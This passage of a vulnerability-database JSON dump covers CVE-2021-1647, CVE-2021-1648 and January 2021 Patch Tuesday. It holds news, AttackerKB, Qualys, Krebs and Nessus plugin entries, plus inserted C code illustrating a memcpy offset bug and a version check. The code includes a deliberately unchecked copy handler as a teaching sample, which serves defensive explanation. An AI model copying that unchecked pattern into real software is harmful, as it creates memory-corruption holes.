actor-controlled blog.\"\n\nMicrosoft's analysis of the malicious DLL (dubbed \"Comebacker\") has also revealed the group's attempts to evade detection via static indicators of compromise (IoCs) by frequently changing file names, file paths, and exported functions. 
\"We were first alerted to the attack when Microsoft Defender for Endpoint detected the Comebacker DLL attempting to perform process privilege escalation,\" the company [said](<https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/>).\n\nThat's not all. With some researchers infected simply by visiting the website on fully patched systems running Windows 10 and Chrome browser, the company suspects a Chrome exploit chain leveraging zero-day or patch gap exploits was hosted on the blog, leading to the compromise.\n\n\"A blog post titled _DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug_, was shared by the actor on October 14, 2020 from Twitter,\" the researchers said. \"From October 19-21, 2020, some researchers, who hadn't been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-01-29T09:15:54", "published": "2021-01-26T05:10:00", "id": "THN:970890B8E519A3BC5427798160F5F09C", "href": "https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html", "type": "thn", "title": "N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-02-04T21:15:31", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "CVE-2021-1647 is a zero-day remote code execution vulnerability in the Malware Protection Engine component (mpengine.dll) of Microsoft\u2019s Defender anti-virus product. 
It was published as part of the January 2021 Patch Tuesday release, along with a disclosure from Microsoft acknowledging that the vulnerability had been exploited in the wild. More information: <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at January 13, 2021 3:55pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 1**gwillcox-r7** at February 04, 2021 7:15pm UTC reported:\n\nNo useful information has been published so far and most of the speculations found online are based on the [CVSS 3.0](<https://www.first.org/cvss/v3-0/>) metrics found in the [advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>). 
That said, the attack vector seems to be [Local](<https://www.first.org/cvss/v3.0/specification-document#2-1-1-Attack-Vector-AV>) but can be exploited remotely, which means that some kind of malicious file needs to be placed locally to be scanned by Windows Defender and trigger the vulnerability. After talking about this with **@smcintyre-r7** and **@bwatters-r7**, we can imagine that `Remote` means this file needs to be sent remotely somehow, for example, using a file upload in a website or an email attachment via Exchange.\n\nSome considerations to keep in mind: Windows defender vulnerabilities get patched immediately and automatically, without user interactions. So, the exploitation window is very short. Finally, even if the exploitation succeeds, the evasion will be problematic, since the anti-virus will probably detect the attack.\n", "modified": "2021-01-16T00:00:00", "published": "2021-01-12T00:00:00", "id": "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13", "href": "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability", "type": "attackerkb", "title": "CVE-2021-1647 Microsoft Windows Defender Zero-Day Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T21:07:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. 
This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4\n\n**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n", "modified": "2020-07-24T00:00:00", "published": "2020-06-09T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "type": "attackerkb", "title": "CVE-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-01-15T00:26:33", "bulletinFamily": "blog", "cvelist": ["CVE-2020-17087", "CVE-2021-1647", "CVE-2021-1648"], "description": "This month\u2019s Microsoft Patch Tuesday addresses 83 vulnerabilities. The 10 Critical vulnerabilities cover Windows codecs, Office, HEVC video extensions, RPC runtime, and several other workstation vulnerabilities. Adobe released patches today for Photoshop, Campaign Classic, InCopy, Illustrator, Captivate, Bridge and Animate.\n\n### Workstation Patches\n\nOffice and Edge vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used to access email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Defender RCE Zero Day\n\nMicrosoft patches Defender Remote Code Execution vulnerability ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in today's patch release for Microsoft Malware Protection Engine. Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.\n\n### splwow64 Elevation of Privilege\n\nWhile Microsoft labeled this issue ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) as an elevation-of-privilege vulnerability, it can also be exploited to disclose information, specifically uninitialized memory. 
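Stone's description quoted in the AttackerKB assessment above (a memcpy whose src and dest came straight from the client, "fixed" by turning the pointers into offsets while leaving the arguments under the client's control) and the Qualys note that CVE-2021-1648 also leaks uninitialized memory describe the same bug class. The C program below is an added illustration of that class; it is not code from splwow64.exe, AttackerKB, Qualys, or any of the researchers quoted, and the message layout, section size, and function names are hypothetical. It shows the pointer-based original, the offset-based change that still lets an out-of-range offset write past the section, and a handler that bounds-checks both offsets against the section size before copying.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the bug class: the client sends a message saying
 * where a copy should read from and write to, and the privileged side
 * performs the memcpy.  Layout, sizes and names are hypothetical. */

#define SECTION_SIZE  64   /* hypothetical shared section the client may touch */
#define ADJACENT_SIZE 16   /* memory right after it that must stay intact    */

/* Original bug: raw pointers travel in the message. */
typedef struct { uintptr_t src; uintptr_t dst; size_t len; } msg_ptr_t;

/* "Fixed" message: pointers replaced by offsets into the shared section. */
typedef struct { size_t src_off; size_t dst_off; size_t len; } msg_off_t;

/* Original handler: copies wherever the client says (arbitrary read/write). */
void handle_ptr(const msg_ptr_t *m)
{
    memcpy((void *)m->dst, (const void *)m->src, m->len);
}

/* Incomplete fix: offsets instead of pointers, but no bounds check, so an
 * offset at or beyond SECTION_SIZE still reads or writes past the section. */
void handle_off_unchecked(uint8_t *section, const msg_off_t *m)
{
    memcpy(section + m->dst_off, section + m->src_off, m->len);
}

/* Hardened handler: every byte read and written must lie inside the section.
 * The comparisons are arranged so that off + len can never wrap around. */
int handle_off_checked(uint8_t *section, size_t section_size, const msg_off_t *m)
{
    if (m->len > section_size) return -1;
    if (m->src_off > section_size - m->len) return -1;
    if (m->dst_off > section_size - m->len) return -1;
    memmove(section + m->dst_off, section + m->src_off, m->len); /* ranges may overlap */
    return 0;
}

/* Drive the unchecked handler with a crafted message and count how many bytes
 * of the adjacent region it overwrote.  One arena keeps the pointer arithmetic
 * inside a single object so the demonstration itself is well defined. */
int demo_unchecked_bypass(void)
{
    uint8_t arena[SECTION_SIZE + ADJACENT_SIZE];
    uint8_t *section  = arena;
    uint8_t *adjacent = arena + SECTION_SIZE;
    memset(section, 0x41, SECTION_SIZE);
    memset(adjacent, 0x00, ADJACENT_SIZE);

    msg_off_t crafted = { .src_off = 0, .dst_off = SECTION_SIZE, .len = ADJACENT_SIZE };
    handle_off_unchecked(section, &crafted);

    int clobbered = 0;
    for (size_t i = 0; i < ADJACENT_SIZE; i++)
        if (adjacent[i] == 0x41) clobbered++;
    return clobbered;                 /* 16: the whole adjacent region was overwritten */
}

/* The same crafted message against the hardened handler is rejected. */
int demo_checked_rejects(void)
{
    uint8_t arena[SECTION_SIZE + ADJACENT_SIZE];
    memset(arena, 0x00, sizeof arena);
    msg_off_t crafted = { .src_off = 0, .dst_off = SECTION_SIZE, .len = ADJACENT_SIZE };
    return handle_off_checked(arena, SECTION_SIZE, &crafted);   /* -1 */
}

/* A legitimate in-bounds copy still works with the hardened handler. */
int demo_checked_accepts(void)
{
    uint8_t section[SECTION_SIZE];
    memset(section, 0x00, sizeof section);
    section[0] = 0x7f;
    msg_off_t legal = { .src_off = 0, .dst_off = 32, .len = 16 };
    if (handle_off_checked(section, SECTION_SIZE, &legal) != 0) return -1;
    return section[32] == 0x7f ? 0 : -2;                          /* 0 */
}

int main(void)
{
    printf("unchecked offsets: %d adjacent bytes clobbered\n", demo_unchecked_bypass());
    printf("checked offsets:   rc=%d for the same message\n", demo_checked_rejects());
    printf("checked offsets:   rc=%d for an in-bounds copy\n", demo_checked_accepts());
    return 0;
}
```

The missing check on src_off is the information-disclosure side that Qualys mentions: an out-of-range source offset copies memory the client was never meant to see into a section the client can read back. Offsets only become a fix once both of them, together with the length, are validated against the size of the region they index.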
Microsoft stated the vulnerability has not been exploited in the wild, although details are available publicly.\n\n### Windows Kernel Local Elevation of Privilege\n\nMicrosoft updated [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) for Windows Server 2012 in today's Patch Tuesday, and users are recommended to apply today's patches for Windows Server 2012.\n\nWe appreciate Microsoft's acknowledgement of our co-ordinated disclosure of the underlying regression in the Windows Server 2012 version of this security update.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb21-01.html>), [Illustrator](<https://helpx.adobe.com/security/products/photoshop/apsb21-02.html>), [Animate](<https://helpx.adobe.com/security/products/photoshop/apsb21-03.html>), [Campaign](<https://helpx.adobe.com/security/products/photoshop/apsb21-04.html>), [InCopy,](<https://helpx.adobe.com/security/products/photoshop/apsb21-05.html>) [Captivate](<https://helpx.adobe.com/security/products/photoshop/apsb21-06.html>) and [Bridge](<https://helpx.adobe.com/security/products/photoshop/apsb21-07.html>). 
The patches for Adobe Campaign are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "modified": "2021-01-12T20:01:43", "published": "2021-01-12T20:01:43", "id": "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "January 2021 Patch Tuesday \u2013 83 Vulnerabilities, 10 Critical, One Zero Day, Adobe", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-01-13T02:27:43", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2019-1458", "CVE-2020-1660", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1660", "CVE-2021-1709"], "description": "**Microsoft** today released updates to plug more than 80 security holes in its **Windows** operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. 
Ten of the flaws earned Microsoft's most-dire "critical" rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.\n\nMost concerning of this month's batch is probably a critical bug ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in Microsoft's default anti-malware suite -- **Windows Defender** -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it's not entirely clear how this is being exploited.\n\nBut **Kevin Breen**, director of research at **Immersive Labs**, says depending on the vector the flaw could be trivial to exploit.\n\n"It could be as simple as sending a file," he said. "The user doesn't need to interact with anything, as Defender will access it as soon as it is placed on the system."\n\nFortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.\n\nBreen called attention to another critical vulnerability this month -- [CVE-2021-1660](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1660>) -- which is a remote code execution flaw in nearly every version of Windows that earned a [CVSS score](<https://www.first.org/cvss/>) of 8.8 (10 is the most dangerous).\n\n"They classify this vulnerability as 'low' in complexity, meaning an attack could be easy to reproduce," Breen said. "However, they also note that it\u2019s 'less likely' to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us."\n\nCVE-2021-1660 is actually just one of five bugs in a core Microsoft service called **Remote Procedure Call** (RPC), which is responsible for a lot of heavy lifting in Windows. 
Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.\n\n**Allan Liska**, senior security architect at **Recorded Future**, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- [CVE-2019-1409](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1409>) and [CVE-2018-8514](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-8514>) -- were not widely exploited.\n\nThe remaining 70 or so flaws patched this month earned Microsoft's less-dire "important" ratings, which is not to say they're much less of a security concern. Case in point: [CVE-2021-1709](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1709>), which is an "elevation of privilege" flaw in Windows 8 through 10 and Windows Server 2008 through 2019.\n\n"Unfortunately, this type of vulnerability is often quickly exploited by attackers," Liska said. "For example, [CVE-2019-1458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458>) was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching."\n\n**Trend Micro's ZDI Initiative** pointed out another flaw marked "important" -- [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>), an elevation of privilege bug in Windows 8, 10 and some Windows Server 2012 and 2019 that was publicly disclosed by ZDI prior to today.\n\n"It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch," ZDI's **Dustin Childs** said. 
"The previous CVE was being exploited in the wild, so it\u2019s within reason to think this CVE will be actively exploited as well.\u201d\n\nSeparately, Adobe released security updates to tackle at least eight vulnerabilities [across a range of products](<https://blogs.adobe.com/psirt/?p=1960>), including **Adobe Photoshop** and **Illustrator**. There are no **Flash Player** updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft's update cycle from last month removed the program from Microsoft's browsers.\n\nWindows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nPlease back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), [Acronis](<https://www.acronis.com/en-us/products/true-image/>) and [Macrium](<https://www.macrium.com/>) are two that I've used previously and are worth a look.\n\nThat said, there don't appear to be any major issues cropping up yet with this month's update batch. 
But before you apply updates consider paying a visit to [AskWoody.com](<https://www.askwoody.com/category/microsoft-windows-patches-security/>), which usually has the skinny on any reports about problematic patches.\n\nAs always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "modified": "2021-01-13T01:32:20", "published": "2021-01-13T01:32:20", "id": "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "href": "https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/", "type": "krebs", "title": "Microsoft Patch Tuesday, January 2021 Edition", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:27:15", "description": "The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. 
An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Forefront Endpoint Protection (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:system_center_endpoint_protection"], "id": "SMB_NT_MS21_JAN_FEP.NASL", "href": "https://www.tenable.com/plugins/nessus/144886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144886);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Forefront Endpoint Protection (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Forefront Endpoint Protection installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. 
Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:system_center_endpoint_protection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"fep_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Forefront Endpoint Protection';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if we got the Malware Engine Version\nif (isnull(app_info['engine_version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'engine_version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:27:16", "description": "The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. 
An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "Security Update for Windows Defender (January 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1647"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:windows_defender"], "id": "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "href": "https://www.tenable.com/plugins/nessus/144876", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144876);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2021-1647\");\n\n script_name(english:\"Security Update for Windows Defender (January 2021)\");\n script_summary(english:\"Checks the Malware Engine version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An antimalware application installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Malware Protection Engine version of Microsoft Windows Defender installed on the remote Windows host\nis prior to 1.1.17600.5. It is, therefore, affected by an unspecified remote code execution vulnerability. An\nauthenticated, local attacker can exploit this to bypass authentication and execute arbitrary code with administrator privileges.\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?66e83fa0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable automatic updates to update the malware engine for the relevant antimalware applications. 
Refer to Knowledge Base\nArticle 2510781 for information on how to verify that MMPE has been updated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_defender\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/svcs\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp = 'Windows Defender';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\n# Check if disabled\nif (!isnull(app_info['Disabled']))\n exit(0,'Windows Defender is disabled.');\n\n# Check if we got the Malware Engine Version\nif (isnull(app_info['Engine Version']))\n exit(0,'Unable to get the Malware Engine Version.');\n\nconstraints = [{'max_version': '1.1.17600.5', 'fixed_version':'1.1.17700.4'}];\n\nvcf::av_checks::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, check:'Engine Version');\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-02T14:45:44", "description": "The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. 
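Both Nessus plugins above decide vulnerability to CVE-2021-1647 from the Malware Protection Engine version alone, with 1.1.17700.4 as the fixed build in their constraints. Anyone reproducing that check in their own inventory tooling (for example for hosts that cannot reach the engine auto-update) has to compare the version numerically per component, because a lexical comparison such as strcmp sorts "1.1.9000.1" after "1.1.17700.4" and would report an old engine as fixed. The program below is an added example and not Tenable's code; the fixed build number is the one the plugins use, and the sample version strings are constructed.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define VER_PARTS 4

/* Fixed Malware Protection Engine build for CVE-2021-1647, as in the Nessus
 * constraints above: engines below 1.1.17700.4 are reported. */
static const unsigned long MMPE_FIXED[VER_PARTS] = { 1, 1, 17700, 4 };

/* Parse "a.b.c.d" into four numeric components.  Returns 0 on success and -1
 * for anything that is not exactly four dot-separated unsigned integers
 * (empty fields, signs, whitespace, trailing text, too few or too many parts). */
int parse_version(const char *s, unsigned long out[VER_PARTS])
{
    const char *p = s;
    for (int i = 0; i < VER_PARTS; i++) {
        char *end;
        if (*p < '0' || *p > '9') return -1;      /* strtoul alone would accept "+", "-", " " */
        errno = 0;
        out[i] = strtoul(p, &end, 10);
        if (errno != 0) return -1;                 /* component does not fit */
        if (i < VER_PARTS - 1) {
            if (*end != '.') return -1;
            p = end + 1;
        } else if (*end != '\0') {
            return -1;                             /* trailing junk such as "4beta" */
        }
    }
    return 0;
}

/* Component-wise comparison with the sign convention of strcmp. */
int compare_version(const unsigned long a[VER_PARTS], const unsigned long b[VER_PARTS])
{
    for (int i = 0; i < VER_PARTS; i++) {
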